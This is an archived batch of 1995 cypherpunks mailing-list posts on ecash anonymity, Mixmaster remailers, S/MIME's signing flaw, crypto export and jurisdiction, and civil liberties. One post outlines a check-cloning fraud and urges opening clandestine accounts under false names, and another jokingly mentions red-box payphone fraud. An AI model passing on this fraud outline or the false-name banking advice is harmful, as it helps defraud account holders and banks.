forged bills (at least forged bills based on a hard-to-identify
original bill.)

>My hunch, just a hunch, is that Chaum has been concentrating on the
>particular protocols which avoid online clearing and which avoid avoid the
>payer/payee untraceability for pragmatic reasons.  Pragmatic as in
>"politically wise."
maybe so...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 02:09:11 PDT
To: hallam@w3.org
Subject: Re: Scientology/Wollersheim as test case for key disclosure
Message-ID: <199509150908.CAA22173@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:42 PM 9/9/95 -0400, Phill wrote:
>One solution to this problem would be to modify PGP so that the session key
for 
>the document was released rather than the passphrase for the public key. The 
>former would provide only read access, the latter would allow th
scientologists 
>to forge Wollerstein's signature on other material. In addition many of the 
>documents may be subject to privillege.

It wouldn't be hard, though I'm not sure it's much different from requiring
the owner of the public key to decrypt the document in the first place.
It does give you some verifiability (somebody else can take the session key
and demonstrate that encrypting it with the recipient's public key does or 
does not produce the encrypted-key string in the document being verified.)
If that's what you plan to use it for, you would also need to have the
entire padded session key and not just the session key itself.

Total amount of work to implement - another command-line option, a print
statement,
and maybe another command-line option and bit of code to allow decryption of a
public-key-encrypted document using a command-line-supplied session key.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Sep 95 02:23:14 PDT
To: cypherpunks@toad.com
Subject: RE: Mixmaster status
Message-ID: <199509150922.CAA12760@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>Let me be crystal clear.
>1) I will not support any version of Mixmaster that is weakened.
>2) All future clients will be able to generate the current message format.
>3) All future servers will be able to read the current message format.
>4) There will always be a free version of the client with source code.

But will the commercial version of the server come with source code?

>While I have not discussed it, I can not imagine that there would not also
>be a free version of the server code (with source). Without remailers what
>is the point of the client software? 

Will Mixmaster become the Netscape(tm) of remailers?  And when is the IPO? ];>

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 15 Sep 95 01:48:22 PDT
To: tcmay@got.net
Subject: Re: Why ecash is traceable
Message-ID: <199509150847.CAA03047@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Excellent discussion on the subject, actually. However, your idea of
the "first person to the bank" maintaining anonymity via remailer block
is flawed. First of all, if a collusion with the bank is being taken into
account, presumably sufficient enough resources are involved that someone
may try and track the reply block. Mixmaster (as your messages mentioned
by name) would be necessary to eliminate the chance of tracking the block
through combinations of replay attacks etc. (Which reminds me, has anyone
implemented an Expiration date on Type I remailers yet?? I remember someone
telling me it was being put into the RFC) However, mix does not have a
reply block system. Nor are there any Type I -> Mix gateways, for reasons
mentioned months ago. (PS, For historical sake, I was a strong supporter
of a Shamir Sharing Shell Game[tm] with the type I message. Everything
during those months came out of a rant program, so I can hardly expect you
to have saved them)
 
Soooo... Anyone up for a Shamir Sharing Shell game? Of course, a drop
box system would be *much* sexier. Combined with, say, an encrypted socket,
or maybe MIXing a packet straight to your door. (Every client a mix site,
remember? Just make yourself a mix key and give it to the drop box. I
figure if the TLA has you by then, you might as well trust the drop-box
operator too)
 
ObMiscCrypto:
Cypherpunk archives seem to have been down for a month, and a mailto://
didn't wake anybody up.
 
I got a message from Bob Silverman, apparently he would not be opposed
to giving his software to the C-punk key Cracking Ring, Inc. as a group
on the understanding that the group lend him some factored numbers.
He reports having no PGP key, so getting a PGP sig won't be happening.
Perhaps someone who knows him or someone who knows about factoring
software would volunteer to get the goods? 

ObHiMom: Hi Mom.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFk9cMLa+QKZS485AQHEpgL8C2N2eioUPaMqLlbzFL29F5zvq50J1o1+
nyoVxV51U4mglT40J8XZmF3/+15mN0aDbbA1NbOzd/7x20TeXnOwGGRHB2iHF0NB
k++VRMrwX85MZ5snlf/c0l5XGnxKEuU6
=7hGk
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@iafrica.com>
Date: Thu, 14 Sep 95 19:00:27 PDT
To: Dar Scott <dsc@swcp.com>
Subject: [NOISE] Re: Linking = Showing = Transferring?
In-Reply-To: <v01510101ac7e7081b71f@[198.59.115.134]>
Message-ID: <Pine.NEB.3.91.950915024828.298Z-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> I wonder if I have a pornopage.

Of course you do (assuming the stupid transitive definition of a
pornopage). 

Start at your home page
    http://www.swcp.com/~correspo/DSC/DarScott.html
--> follow link to "National Instruments" in second paragraph
    http://www.natinst.com/
--> follow link to "Reference" a few lines form the bottom of the page
    http://www.natinst.com/links.htm
--> "WWW Virtual Library" near the top of the page
    http://epims1.gsfc.nasa.gov/engineering/ee.html
--> "WWW Virtual Library" right at the top of page
    http://www.w3.org/hypertext/DataSources/bySubject/Overview.html
--> "Other virtual libraries" near the bottom of the (rather long) page
    http://www.w3.org/hypertext/DataSources/bySubject/Virtual_libraries/Overview.html
--> "Yahoo - A Guide to WWW"
    http://www.yahoo.com/
--> "Entertainment"
    http://www.yahoo.com/text/Entertainment/
--> "Magazines"
    http://www.yahoo.com/text/Entertainment/Magazines/
--> "Sex"
    http://www.yahoo.com/text/Entertainment/Magazines/Sex/
--> you figure out the rest





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 15 Sep 95 00:27:55 PDT
To: cypherpunks@toad.com
Subject: Check Cloning frenzy and attack on anonymous accounts
Message-ID: <Pine.SUN.3.91.950915032650.5324A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Cypherpunks might want to take note of the recent flurry of news program 
stings on banks which do not demand 12 pieces of identification in order 
to open an account.

The latest horseman, check "cloners."

Two networks have now run hidden camera stings on banks where they offer 
all manner of obnoxious fake identification and open accounts in silly 
names.

The "purpose" being to expose the ease with which a dreaded check 
"cloner" can open an account to transfer your funds into.

The process goes something like this:

Check cloner gets account number from ATM slip or otherwise. Check 
cloner prints up 30 "checks" in any name at all with magnetic ink 
account number on the bottom for the benefit of automatic readers at the 
bank.  Checks are written to the account in false name and withdrawn.

For some reason, the focus seems to be on the ease with which one opens 
an account- rather than with the need to safeguard account information, 
and the lack of oversight by banks.  Of course, the liability for these 
crimes is with the bank, which cleared a check without the proper 
signature.

Of course, the immediate solution, rather than insuring the banks pay 
their liability for their insecure payments and check clearing system, 
and their printing account information on any piece of paper they can 
find, is going to be a crackdown on account identification- and probably 
legislation.  (Note that often banks take months to pay the shortfall- 
when they do at all).  New accounts can expect to have to cough up 
significant identification and I predict a re-newed call for national 
identification credentials.

Tell the banks they have to pay within 2 days of the presentation by the 
duped depositor of the fraudulent checks and I would lay odds that the 
banks would be screaming bloody murder for a more secure payments and 
check clearing system than the trash they have now.  Of course, because 
of the ignorance of the media, this will never happen.  Of course, 
paying in cash will never be looked to as an answer either.

Typical creeping statism.


I suggest those of you who open clandestine accounts open a flurry now, 
before things get tough.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Fri, 15 Sep 95 05:23:39 PDT
To: pfarrell@netcom.com
Subject: Re: Why ecash is traceable
In-Reply-To: <28922.pfarrell@netcom.com>
Message-ID: <199509151220.FAA00243@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Pat Farrell says:
> Because you lose most (all?) anonymous abilities. (I think) 
> So when the money Alice gave to Bob gets deposited by TCMay,
> That it was Alice's is instantly known. This is not how physical cash works.
> 
> There is a chain from TCMay through some number of steps to Bob.
> Even if you can't find it with this single case, you could use
> a zero-knowledge type proof to slowly uncover Bob's identity.
> 
> I keep wanting to believe in ecash, but I'm not convinced
> it can exist.

Just a little humor...
Perhaps Electronic Cash has a sound.
Phone Phreakers have something called a Redbox.
This device makes the sound of a quarter.
When an ATT pay phone asks you to deposit $1.75
you just make the sound of 7 quarters... :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 15 Sep 95 02:49:17 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509150944.FAA48388@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis wrote:

<snip>

>Last I checked, FDA, UL, or state bar association approval does not 
>*require* you to take, use, or hire the approved drug, toaster or lawyer.  
>Market forces are still at work, albeit in a filtered environment.

The filter is weakest from UL, yet I trust its output the most.

>Just a first cut.  And even that can usually be gotten around.

Getting around David KeSSler involves about $30 million and a *bunch*
of lawyers. Skipping this first cut, even with far safer products (IMO)
than "Proscar," can lead to an armed raid of your doctor's office.
If state bars can usually be gotten around, why take three of them?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMFk2Jm1lp8bpvW01AQESMwP/abBCBbhGKOjVFFkjl4elOcTA3oD9WgEa
e+AsmtuLSEstvSfZ6u3CxO5sfu0lka0erBsVyDjqWs97WlvQOD0qX+3O91hoURp4
pytfTSE+MtTlIQCIoxVBMgjOYplNLOOYmnomksypJFpOzyuofoYnIScfRLkAWvAB
SFEqvrCtfP8=
=cfgW
-----END PGP SIGNATURE-----
Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand
of a police state. Then, do not allow the government to deploy those
technologies."  -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 15 Sep 95 02:59:33 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <199509150047.UAA18025@book.hks.net>
Message-ID: <Pine.SUN.3.91.950915055557.22150A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 14 Sep 1995, Lucky Green wrote:

> The answer is trivial. If it pisses of the fascists in power enough, you
> go to jail or get killed.
> 
> - -- 
> - -- Lucky Green <mailto:shamrock@netcom.com>

As a libertarian nut, I bow to no one in my love of extreme statements.  
But I feel compelled to sqaush this particular notion whenever I see it.  
Randy Weaver really pissed off the Feds and did not go to jail (except 
during trial) and received a $3.1 million settlement.  (.1 to him, 3 to 
the kids but they are minors).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 04:15:11 PDT
To: rsalz@osf.org
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9509151114.AA07872@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Another even more subtle problem is inline images, can you say that a
>page with an inline image sourced from a foreign site must obey the
>foreign jurisdiction.  I would assert this is so, because the web
>surfer's *browser* imports the relevant parts of the page from
>whatever locations (and jurisdictions) they are in, and displays them
>as one page.

Inline images are not references -- they are part of the page being
retrieved.  

>	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">
>So that the image is *imported* by the *viewer*, and not supplied by
>www.obscura.

Inlined images are just a convenient way of chunking.  The image is imported
by the viewer because the server, as part of the base document, told it
to do so.  You might be able to fool an ignorant court, but it still
doesn't change the fact that Lance has a document that in the natural
course of operation of the Web, exports crypto.  I would advise him to
edit the page so it reads
	Click <A HREF="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">here
	to see a picture of the shirt.

Heck, the very word, "inline" gives it away.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 04:18:35 PDT
To: cypherpunks@toad.com
Subject: Some informed comments on RSA's S/MIME
Message-ID: <9509151118.AA07881@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 14 Sep 1995 08:39:49 -0700 (PDT)
>From: Ned Freed <NED@innosoft.com>
Subject: Re: Re[2]: MOSS conformance testing
Cc: pem-dev@TIS.COM
Message-id: <01HV9F2PHBSU8Y4Z8U@INNOSOFT.COM>

> I just got wind of RSA's draft for Content-Type: application/x-pkcs7-mime.
> Has there been any discussion on this - comparison to PEM etc.? If so
> where's the list, URLs of archives....? Or did I just go "deaf" for a while
> here on thist list? (The last could of months have been caught up in
> changing companines...)

S/MIME was developed privately by RSA in conjunction with a number of other
companies. To the best of my knowledge all discussion has occurred on closed,
private lists. As a potential customer of RSA I recently managed to get myself
added to one of these lists (it may or may not be the only one where S/MIME is
discussed) but I haven't had time to post anything there yet. I plan to post
this message there in the next couple of days.

I'm not saying this approach to protocol development is a good thing or a bad
thing, but I do believe that it has led to the production of a specification
that is seriously flawed, and that those flaws would have been detected and
probably corrected had the discussion been more public.
More on this below.

> I browsed through the IETF drafts & personal contributions & search tool...
> didn't find anything on RSA's "S/MIME".

> I did get the PostScript file from RSA's pages & had a read....

> http://www.rsa.com/pub/S-MIME/

The specification, at least, is public. Given the amount of press surrounding
this proposal and the strong liklihood of it being widely used I strongly
recommend that everyone who is interested in email security obtain a
copy of the specification and read it.

However, the proposal is simple enough that it can be summarized in just two
paragraphs. S/MIME is based on PKCS #7, which in turn is based on classic PEM.
The significant difference between PKCS #7 and PEM is that it uses an ASN.1
encoding for the entire security object rather than the header/text encoding of
RFC1421. In fact the specification states that mechanical conversion between
RFC1421 formats and PKCS #7 should be possible as long as the proper set of
algorithms are used. I think that mechanical conversion into and out of the
PEM-derived subset of MOSS is also feasible but I haven't checked up on the
specifics of this.

S/MIME in turn is a simple encapsulation of PKCS #7 in MIME, consisting of  an
application subtype label and an encoding of the PKCS #7 object using standard
MIME encodings. The inner secured content is then seen as another MIME object.
This is almost identical to Jeff Schiller's earlier proposal for embedding PEM
in MIME. There is only one significant twist -- in the case of signed but not
encrypted data the specification calls for the use of multipart/alternative,
with the first part being an unsigned copy of the signed data and the second
part being the PKCS #7 object, including the signed data.

Two obvious flaws in this approach should be obvious from this description. The
first is simply one of excessive overhead -- sending signed material in such a
way that it can be read on vanilla email systems as well as with an S/MIME
system introduces something on the order of 133% overhead.

The second flaw is more serious. The data that a user without S/MIME reads is
not signed. This opens the door to attacks where the unsigned version is
tampered with but the signed version is left alone.

This turns into a really insidious problem when you consider how privacy
services are likely to be deployed in some environments. One model I expect to
be rather popular is that of having a remote signature verification service
within a secure enclave. That is, most of the user agents that people use won't
have the ability to validate a signature. Users will, however, have secure
access to an agent that will validate the signature on a message for them. (The
service may well be a different application on the same machine.) They simply
submit the message to this service and it tells them whether or not the
signature matches.

The problem, of course, is that the material the user of the unextended agent
reads isn't what's signed. And in general there is no way to correlate this
material with the signed copy -- since it was exposed to the message transport
layer without any special tagging to indicate its signed nature the transport
may well have changed it so its no longer a byte-for-byte copy of the signed
version (which is inherently protected against such munging). 

Comparing this approach with security multiparts is quite instructive. Security
multiparts only introduces the overhead necessary to encode the single copy of
the data -- at most 33% in the case of base64 -- plus of course the fixed
overhead of the signature information. As such, it is far more efficient than
S/MIME when it comes to signed but unencrypted material. Security multiparts
can be processed in a single pass as well. I'm not sure this is true of S/MIME
-- it depends on the specifics of the ASN.1 structure that's used. But by far
the most important difference is that security multiparts do not suffer from
this vulnerability when used in an environment with remote security servers. 

You can of couse avoid this problem by not including the extra copy of the
signed material. The problem with this approach is that you won't be able to
read such a message on anything short of an agent that knows how to take apart
a PKCS #7 structure.

I note in passing that there was absolutely no reason why security multiparts
could not have been used in S/MIME instead of the chosen encapsulation. PKCS #7
explicitly provides a facility whereby the secured data is stored outside of
the ASN.1 object. This then fits seamlessly into the security multiparts
methodology.

I do not propose to debate the relative merits of PKCS #7 versus MOSS. Modulo
the MIME issues this is essentially the same as debating the merits of PEM
versus MOSS, and I've had more of that than I care for. Besides, I think folks
should use whatever security service they feel like using. I've maintained all
along that my interest is primarily that of standardizing on a single embedding
methodology for use with MIME. I'm very disappointed that S/MIME has seen fit
to use what to my mind is a technically inferior embedding solution when
compared to security multiparts, and I'd really like to try to get the S/MIME
folks to switch to a security multiparts approach if its not too late for them
to do so.

I'm very interested in any and all comments on what I've written here. I intend
to post them to the S/MIME list I'm now on.

				Ned





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 15 Sep 95 07:49:44 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <199509151448.HAA21190@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, I don't have time to write much now.  The missing piece in my
description was the assumption that people would have to send received
cash to the bank non-anonymously.  However as Tim points out that can
be avoided in on line systems, and in that case Alice cannot actually
learn Bob's identity.  However as was also pointed out the cash can at
least be detected and invalidated so technically it is still traceable.
The protection of the payor is still not really as strong as that of
the payee.

I should also mention that when we discussed this earlier Jason Solinsky
suggested that transferrable cash systems also provide a means for Bob
to keep his identity secret.  The cash is still traceable in that the
bank can recognize it when it is finally deposited, but it may have
passed through many people's hands in the meantime and their identities
are not known.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 15 Sep 95 05:03:32 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <28922.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  tcmay@got.net (Timothy C. May)  writes:
> Hal, a very nice summary!

Yes, good job Hal.

> Why not "online clearing" as the preferred model, then?

Because you lose most (all?) anonymous abilities. (I think)

> (There are more abstract ways of viewing this advantage. While mere
> software is always duplicable, and cash numbers are of course duplicable,
> one thing that is not duplicable is this: "the first agent to present a
> valid number at this bank." There can be only one of these, and this
> uniqueness is what keeps the currency from collapsing, what introduces
> _conservation_ into the system.)
>
> Well, since Alice knows her own blinding factors, she will always be able
> to say to the bank: "My cash will look like this. Watch for it."

So when the money Alice gave to Bob gets deposited by TCMay,
That it was Alice's is instantly known. This is not how physical cash works.

There is a chain from TCMay through some number of steps to Bob.
Even if you can't find it with this single case, you could use
a zero-knowledge type proof to slowly uncover Bob's identity.

I keep wanting to believe in ecash, but I'm not convinced
it can exist.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 15 Sep 95 05:23:33 PDT
To: cypherpunks@toad.com
Subject: VIO_lat
Message-ID: <199509151223.IAA22176@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-15-95. NYPaper:


   "Company Says Electronic Mail Was Opened to Find
   Pornography."

      America Online gave the FBI access to the mailboxes of
      its subscribers to identify several thousand users who
      viewed images of children in sexual poses and to trace
      messages beyond AOL to many more computer users
      nationwide. Because electronic mail has a life of days
      or weeks, can be traced and can be easily copied without
      alerting the owner, reading the mailboxes was
      particularly effective. It was unclear how much
      information about subscribers is routinely kept and how
      much private information was provided to the FBI.
      Actions of users can be recorded and can reveal much
      more personal information than the records a telephone
      company.


   "F.B.I. Chemist Says Experts Are Pressured To Skew Tests."

      Officials at the F.B.I. crime laboratory have been
      accused by one of its chemists, Frederic Whitehurst, of
      pressuring forensic experts to commit perjury to help
      secure criminal convictions. With opinion polls showing
      public support for the F.B.I. eroding after
      Congressional hearings into the Branch Davidian siege,
      the accusations regarding the laboratory are in some
      ways the worst blow yet.


   Two:  VIO_lat  (11 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Fri, 15 Sep 95 08:36:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <Pine.SUN.3.91.950915055557.22150A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950915082125.12633F-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Sep 1995, Duncan Frissell wrote:

> 
> On Thu, 14 Sep 1995, Lucky Green wrote:
> 
> > The answer is trivial. If it pisses of the fascists in power enough, you
> > go to jail or get killed.

> 
> As a libertarian nut, I bow to no one in my love of extreme statements.  
> But I feel compelled to sqaush this particular notion whenever I see it.  
> Randy Weaver really pissed off the Feds and did not go to jail (except 
> during trial) and received a $3.1 million settlement.  (.1 to him, 3 to 
> the kids but they are minors).
> 
> DCF
> 

Not quite squashed, Duncan.  Bullet placement (poor by some standards)
is all that prevented Mr. Weaver from croaking like his unfortunate wife.
She is said to have "pissed off" the feds but was not charged with a
single actionable item yet she remains quite dead.

Unless I have missed somthing somewhere, no TLA is concerned in the slightest
with individual liberty.  That notion should keep a rational person awake
nights.

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 15 Sep 95 05:59:09 PDT
To: loki@obscura.com
Subject: RE: Mixmaster status
In-Reply-To: <ac7edf5800021004fd74@[137.110.24.250]>
Message-ID: <m0staLr-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Date: Fri, 15 Sep 1995 01:03:58 -0700
   From: loki@obscura.com (Lance Cottrell)

   Let me be crystal clear.
   1) I will not support any version of Mixmaster that is weakened.
   2) All future clients will be able to generate the current message format.
   3) All future servers will be able to read the current message format.
   4) There will always be a free version of the client with source code.

And also that Mixmaster(tm) is a trademark of Lance Cottrell, and as
long as he owns it, he controls the use of it.  If you trust Lance,
you can trust the name Mixmaster(tm).

   While I have not discussed it, I can not imagine that there would not also
   be a free version of the server code (with source). Without remailers what
   is the point of the client software? 

I'm confused here.  Isn't every copy of mixmaster potentially a client
and/or server?  That seems to me to be one of the beautiful aspects of
mixmaster -- run a remailer and you greatly increase your own privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMFl4eabBSWSDlCdBAQFkOgP+KN3YYk6Wvq7T4V+uihg6u8NVY3iRobMJ
LFOrpm5LrG/WGMfpUouUt4/XfItWrEkRobgFLZaZ407tMkdG0tOUXSixmohdzXS9
AzEB6+Rj+KHqKjRiM2YTdUGLxLF2oQLoN05g2Trj3/V1XQrHwLU7zj/H6nJlrz1M
FP6A5KCc+EU=
=lzQY
-----END PGP SIGNATURE-----

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Fri, 15 Sep 95 09:04:16 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: NSA on GAK
Message-ID: <v02110103ac7efea7e15c@[204.179.132.6]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:25 9/14/95, Rich Salz wrote:
>>> Internet runs on software distributed over the Internet.
>
>This is more like an aphorism than a true statement.

Um, not really. I dunno about you, but I don't bother to get new ROMs from
cisco for each new software release - I FTP the code over the net, and
write it into flash RAM in the routers (or net boot it). So, in fact, there
are many sites (and backbones) for which that statement is literally true.

Erik Fair

P.S.    And yes, cisco does publish MD5 hashes of their binaries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 15 Sep 95 06:08:25 PDT
To: cypherpunks@toad.com
Subject: Chiffrement en Fr
Message-ID: <199509151308.JAA21250@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


A web search for Quisquater led to:

   URL: http://www.cnam.fr/Network/Crypto/

which offers, among other belle chiffre-escrits:


                    L'UTILISATION DU CHIFFREMENT EN FRANCE
   
   Le chiffrement est la technique qui consiste  modifier un 
fichier de
   faon  le rendre illisible par les personnes auxquelles il 
n'est pas
   destin. Pendant longtemps l'apanage des militaires, il est 
maintenant
   un outil indispensable  l're des rseaux pour ceux qui 
veulent
   protger la confidentialit de leurs messages. Son 
utilisation soulve
   diverses questions. Si cette page Web est l'une des 
premires en
   France, il en existe de nombreuses aux Etats-Unis .
   
   Je ne parlerai pas beaucoup de technique sur cette page. Si 
vous
   voulez en savoir plus, regardez :
     * L'excellent serveur du Groupe de Recherche en Complexit 
et
       Cryptographie,
     * Quelques modestes explications.
   
   Le chiffrement est pratiquement interdit en France par la 
loi 90-1170
   du 29 dcembre 1990 (avec dcret d'application en dcembre 
1992). Une
   excellente petite brochure (avec un sphinx sur la couverture 
:-) de la
   Dlgation Interministrielle pour la Scurit des Systmes
   d'Information (DISSI) explique cette loi (mais 
malheureusement ne
   dtaille pas ses conditions relles d'application). Elle est 
envoye
   gratuitement sur simple demande :
   
   DISSI
   
   3 avenue Octave Grard
   
   75007 PARIS
   
   C'est le Service Central de la Securite des Systemes 
d'Information
   (SCSSI) qui doit etre contact pour plus d'information et 
dpt des
   demandes d'autorisation. Il existe deux cas :

    1. Soit vous utilisez le chiffrement  seule fin 
d'authentification
       (chiffrement de mots de passe pour qu'ils ne circulent 
pas en
       clair sur le rseau, par exemple) : il faut faire une 
dclaration
       au SCSSI qui est ensuite vrifie.

    2. Soit vous l'utilisez pour la confidentialit. Il faut 
alors
       demander une autorisation au SCSSI.
       
  
   SCSSI
   
   18, rue du Docteur Zamenhof
   
   92131 ISSY-LES-MOULINEAUX Cedex
   
   Tl. : (1) 40 95 37 15
   
   Fax. : (1) 40 95 37 01
   
   Dans les deux cas, la demande aura pu tre faite par le 
ralisateur ou
   le vendeur du logiciel.
   
   Plus de dtails sont donns dans la prsentation de Bruno 
Malhey
   (galement en PostScript). J'y ajoute que les critres 
d'acceptation
   ou de refus ne sont pas publics. Il semble que 
l'autorisation ne soit
   donne qu'aux institutions "srieuses" (banques, ...) et  
condition
   de ne pas utiliser de logiciels trop efficaces. En effet, il 
s'agit de
   conserver la possibilit pour la police de suivre les 
changes. On
   notera que la plupart des pays comparables  la France 
autorisent le
   chiffrement, comme le montre l' excellente enqute de 
Sylvain Andr
   (vous pouvez voir aussi l'tude du gouvernement amricain).
   
   Le logiciel de chiffrement le plus connu est PGP (Pretty 
Good
   Privacy). Gratuit, assez simple  utiliser, trs efficace, 
bien
   document, tournant sur de nombreuses plate-formes (Unix, 
MS-DOS,
   Macintosh), c'est un excellent outil pour l'utilisateur. Il 
semble que
   son autorisation en France soit hors de question. Notez que, 
si vous
   voulez utiliser PGP en France, vous avez deux obstacles 
successifs :

    1. PGP est interdit d'exportation par les Etats-Unis. Il 
faut donc
       rcuprer une des (nombreuses) versions sur un serveur
       non-amricain.

    2. Le chiffrement est soumis  autorisation en France. Voir
       ci-dessus.
   
   Certaines personnes trouvent qu'un autre obstacle  
l'utilisation de
   PGP est la difficult d'utilisation. Celles-ci peuvent lire 
le
   remarquable livre de Garfinkel :
   
   Simson Garfinkel
   PGP ; Pretty Good Privacy
   
   O'Reilly & associates
   
   ISBN 1-56592-098-8
   
   Et il existe d'autres prsentations de PGP comme celle 
d'Ollivier
   Robert (fichiers PostScript PGP.*.ps), qui existe aussi sous 
forme
   d'un serveur Web.
   
   PGP protge des fichiers, soit lors de leur transmission sur 
le rseau
   (par courrier lectronique ou autre mthode), soit en local. 
D'autres
   logiciels protgent, par exemple les connexions  distance 
ou le
   systme de fentrage X ( SSH assure ces deux fonctions). 
Visitez le
   service Web "International Cryptography Pages" pour avoir 
tous les
   renseignements possibles, notamment sur les logiciels 
disponibles en
   dehors des Etats-Unis.
   
   Enfin, aprs ces informations purement factuelles, voil mon 
opinion.
   
Voir aussi

     * L'Electronic Frontier Foundation qui lutte pour les 
droits du
       citoyen dans le monde informatis dispose de nombreuses
       informations sur le chiffrement.
     * Computer Professionnals for Social Responsability 
travaille
       galement sur le respect de la vie prive.
     * Toujours en franais, mais conernant plus 
spcifiquement le
       Qubec.
       
   
   Page faite par Stphane Bortzmeyer sur le serveur du CNAM. 
Dernire
   mise  jour le 4 aot 1995.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
